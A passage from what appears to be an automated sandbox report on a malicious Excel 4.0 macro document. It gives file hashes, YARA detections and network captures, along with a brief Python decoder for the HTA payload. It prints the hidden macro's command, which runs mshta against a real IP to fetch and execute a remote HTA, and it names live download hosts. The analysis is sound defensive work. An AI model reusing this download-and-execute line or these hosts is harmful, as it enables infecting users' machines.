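if __name__ == "__main__":
    # Constructed fragment mirroring the assignment seen in the preview.
    fragment = "q52Li668M68pR[0]='" + SAMPLE_LITERAL + "' ;"
    for raw in extract_literals(fragment):
        print(raw, "->", decode_hta_literal(raw))
```

Only the first element of q52Li668M68pR is decodable from the preview; the rest of the script is truncated on this page, so the decoder is written to be pointed at the full HTA once it has been recovered from the sandbox's download list.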
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Cannot read section info
                                    Category:dropped
                                    Size (bytes):1536
                                    Entropy (8bit):1.1464700112623651
                                    Encrypted:false
                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                    Malicious:false
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):28672
                                    Entropy (8bit):3.5189161831469296
                                    Encrypted:false
                                    SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                    MD5:06A30014EFAE12913C829BE85DD271EC
                                    SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                    SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                    SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5771325831414917
                                    Encrypted:false
                                    SSDEEP:96:chQCcMqAqvsqvJCwoqz8hQCcMqAqvsEHyqvJCworAzIuYtHRUVh/lUV0A2:cidoqz8iFHnorAzI1UVhHA2
                                    MD5:739473D4AA0429FF1319C5EB227EAAD3
                                    SHA1:CA575798F0BD07E2CD11E918FE367D6E716CAF54
                                    SHA-256:01ACBA9C38F360BBE15FA5B86E5C313A206BF0E68230FF1E40598E5144547DD2
                                    SHA-512:EB20B6E62892E550C89B0117D5689DC093DEB6B65C43366C399DD93E0AC78BF9F5578E43151CB34E9F4FD1D69B4D74C5E7DC25A1BC4B6438EFC84F55273C495C
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5771325831414917
                                    Encrypted:false
                                    SSDEEP:96:chQCcMqAqvsqvJCwoqz8hQCcMqAqvsEHyqvJCworAzIuYtHRUVh/lUV0A2:cidoqz8iFHnorAzI1UVhHA2
                                    MD5:739473D4AA0429FF1319C5EB227EAAD3
                                    SHA1:CA575798F0BD07E2CD11E918FE367D6E716CAF54
                                    SHA-256:01ACBA9C38F360BBE15FA5B86E5C313A206BF0E68230FF1E40598E5144547DD2
                                    SHA-512:EB20B6E62892E550C89B0117D5689DC093DEB6B65C43366C399DD93E0AC78BF9F5578E43151CB34E9F4FD1D69B4D74C5E7DC25A1BC4B6438EFC84F55273C495C
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):86528
                                    Entropy (8bit):7.100272352481004
                                    Encrypted:false
                                    SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e30:g0k3hbdlylKsgqopeJBWhZFGkE+cMLx0
                                    MD5:2C1128D3E74CCABAC63488793B1F9FC1
                                    SHA1:44BEE61E3B69FA078FA3149A86EE14A6254F41AF
                                    SHA-256:D6C0FE94AE6A74F54312237003CEF973E0874FC637312DF0E199207015D947B4
                                    SHA-512:834D97F729ACF6F20ED523935BE80B4F94371B1E1CC1629ACFCDF2D0519217D67B2B38FFFD0383EBF8C0F6F837A044C97FA4F8C11E2F45B713132C98CCD56479
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\CJ68000754184.xls, Author: John Lambert @JohnLaTwC
                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\CJ68000754184.xls, Author: Joe Security
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):548864
                                    Entropy (8bit):6.980517956334168
                                    Encrypted:false
                                    SSDEEP:12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
                                    MD5:74D1C2A27C684005BDFCE89A1A5618B4
                                    SHA1:033C28F6D209BA26560E472FEA70DDF740435EA0
                                    SHA-256:34347D89E1A340EDC48F050CDDD15CB1E3B1702932887AEA3D97D0D0BFFE4DE8
                                    SHA-512:E0A9010A2AAB912D48672F0DBD30E65664CAE4DA12B4E5444FB5AD8262E4099FFD08E15113871B3EA76EFA07F2F307319ACD699CE49F83CDF2C7734EBDE360A2
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................
                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                    Entropy (8bit):7.044070003028746
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 78.94%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                    File name:CJ68000754184.xls
                                    File size:87565
                                    MD5:84edef677d286111cb0ef9d53e0d51df
                                    SHA1:19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
                                    SHA256:081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
                                    SHA512:3fa012d744b2c065aaed9aa425f88f367b914dcd4f57e902cb6c96493872d12a13f7fdc4c476bf7319c36c0d555be84df8bb4594e4323cc1c51ef0853f8e59fe
                                    SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                    File Content Preview:........................>......................................................................................................................................................................................................................................
                                    Icon Hash:e4eea286a4b4bcb4
                                    Document Type:OLE
                                    Number of OLE Files:1
                                    Has Summary Info:True
                                    Application Name:Microsoft Excel
                                    Encrypted Document:False
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:
                                    Flash Objects Count:
                                    Contains VBA Macros:True
                                    Code Page:1251
                                    Author:xXx
                                    Last Saved By:xXx
                                    Create Time:2022-01-27 23:41:00
                                    Last Saved Time:2022-01-28 06:31:03
                                    Creating Application:Microsoft Excel
                                    Security:0
                                    Document Code Page:1251
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:1048576
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.324918127833
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.263079431268
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                    General
                                    Stream Path:Workbook
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:76002
                                    Entropy:7.62172227998
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                    Name:REEEEEEEE
                                    Type:3
                                    Final:False
                                    Visible:False
                                    Protected:False
                                                      REEEEEEEE
                                                      3
                                                      False
                                                      0
                                                      False
                                                      post
                                     2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")
                                     5,2,=HALT()
                                                   
                                    Name:REEEEEEEE
                                    Type:3
                                    Final:False
                                    Visible:False
                                    Protected:False
                                                      REEEEEEEE
                                                      3
                                                      False
                                                      0
                                                      False
                                                      pre
                                     2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")
                                     5,2,=HALT()
                                                   
                                     Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                     01/28/22-21:18:27.714526 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49168 | 80 | 192.168.2.22 | 91.240.118.172
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Jan 28, 2022 21:18:21.824399948 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.885463953 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.885570049 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.887382984 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.948643923 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949342966 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949457884 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949491978 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949515104 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949542046 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949568033 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949590921 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949603081 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949625015 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949637890 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949660063 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949666977 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949677944 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949698925 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949717999 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949734926 CET | 80 | 49167 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:21.949753046 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949765921 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949769974 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.949784994 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:21.956779957 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:27.648180008 CET | 49168 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:27.709604979 CET | 80 | 49168 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:27.710990906 CET | 49168 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:27.714525938 CET | 49168 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:27.775736094 CET | 80 | 49168 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:27.776531935 CET | 80 | 49168 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:27.776552916 CET | 80 | 49168 | 91.240.118.172 | 192.168.2.22
                                     Jan 28, 2022 21:18:27.776639938 CET | 49168 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:28.073252916 CET | 49169 | 80 | 192.168.2.22 | 164.90.147.135
                                     Jan 28, 2022 21:18:31.093900919 CET | 49169 | 80 | 192.168.2.22 | 164.90.147.135
                                     Jan 28, 2022 21:18:36.523542881 CET | 49167 | 80 | 192.168.2.22 | 91.240.118.172
                                     Jan 28, 2022 21:18:37.100416899 CET | 49169 | 80 | 192.168.2.22 | 164.90.147.135
                                     Jan 28, 2022 21:18:49.211739063 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.390794039 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.390885115 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.391053915 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.569916010 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579858065 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579883099 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579899073 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579916000 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579920053 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.579931974 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579947948 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579963923 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.579963923 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579981089 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.579983950 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.579996109 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.580034971 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.580095053 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.758980036 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.759012938 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.759037018 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.759037018 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.759059906 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.759083033 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.759083033 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.759107113 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.759114981 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.759130001 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.759152889 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.759166956 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.760771990 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760798931 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760818958 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.760821104 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760844946 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760854959 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.760869026 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760891914 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760900974 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.760912895 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760936022 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760950089 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.760957003 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760979891 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.760994911 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.938174009 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938195944 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938210011 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938222885 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938240051 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938256979 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938272953 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938288927 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938299894 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.938303947 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938322067 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938335896 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.938338995 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938354969 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.938357115 CET | 49170 | 80 | 192.168.2.22 | 103.206.244.105
                                     Jan 28, 2022 21:18:49.938371897 CET | 80 | 49170 | 103.206.244.105 | 192.168.2.22
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Jan 28, 2022 21:18:27.823419094 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                     Jan 28, 2022 21:18:28.062777996 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                     Jan 28, 2022 21:18:49.192480087 CET | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                     Jan 28, 2022 21:18:49.210891008 CET | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                     Jan 28, 2022 21:18:27.823419094 CET | 192.168.2.22 | 8.8.8.8 | 0x7e8e | Standard query (0) | hostfeeling.com | A (IP address) | IN (0x0001)
                                     Jan 28, 2022 21:18:49.192480087 CET | 192.168.2.22 | 8.8.8.8 | 0xf8cf | Standard query (0) | jurnalpjf.lan.go.id | A (IP address) | IN (0x0001)
                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                     Jan 28, 2022 21:18:28.062777996 CET | 8.8.8.8 | 192.168.2.22 | 0x7e8e | No error (0) | hostfeeling.com | (none) | 164.90.147.135 | A (IP address) | IN (0x0001)
                                     Jan 28, 2022 21:18:49.210891008 CET | 8.8.8.8 | 192.168.2.22 | 0xf8cf | No error (0) | jurnalpjf.lan.go.id | (none) | 103.206.244.105 | A (IP address) | IN (0x0001)
                                    • 91.240.118.172
                                    • jurnalpjf.lan.go.id
                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                     0 | 192.168.2.22 | 49167 | 91.240.118.172 | 80 | C:\Windows\System32\mshta.exe
                                     Timestamp | kBytes transferred | Direction | Data
                                     Jan 28, 2022 21:18:21.887382984 CET | 0 | OUT | GET /gg/ff/fe.html HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-US
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 91.240.118.172
                                    Connection: Keep-Alive
